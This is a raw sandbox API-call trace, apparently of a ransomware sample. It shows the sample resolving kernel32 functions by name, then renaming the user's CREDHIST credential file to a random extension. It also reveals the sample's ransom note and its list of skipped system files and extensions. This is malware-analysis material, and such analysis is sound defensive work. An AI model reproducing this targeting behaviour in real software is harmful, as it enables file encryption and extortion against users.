lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.228] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.228] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.228] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.228] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.229] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.229] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.229] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.229] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.229] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.229] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.229] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.229] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.229] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.229] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.229] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.229] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.229] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.229] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.229] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.229] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.229] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.229] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.230] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.230] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.230] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.230] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.230] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.230] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.230] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.230] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.230] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.230] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.230] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.230] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.230] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.230] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.230] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.230] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.231] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.231] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.231] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.231] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.231] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.231] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.231] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.231] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.231] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.231] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.231] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.231] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.231] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.231] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.231] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.231] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.231] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.231] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.231] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.232] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.232] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.232] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.232] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.232] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.232] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.232] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.232] lstrlenA (lpString="DELETEATOM") returned 10 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.232] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.232] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.232] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.232] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.232] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.232] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.232] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.232] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.232] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.232] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.233] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.233] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.233] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.233] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.233] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.233] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.233] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.233] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.233] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.233] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.233] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.233] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.233] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.233] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.233] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.233] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.233] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.233] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.233] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.234] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.234] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.234] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.234] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.234] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.234] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.234] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.234] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.234] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.234] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.234] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.234] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.234] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.234] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.234] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.235] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 72 [0078.235] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.FV3Rc5O") returned 80 [0078.235] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.FV3Rc5O" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist.fv3rc5o"), dwFlags=0x0) returned 1 [0078.235] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.236] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.236] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.236] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacf9740, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.236] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.236] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacf9740, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.236] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.236] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.237] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.237] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.237] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.237] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.237] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0078.237] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.237] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" [0078.237] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS 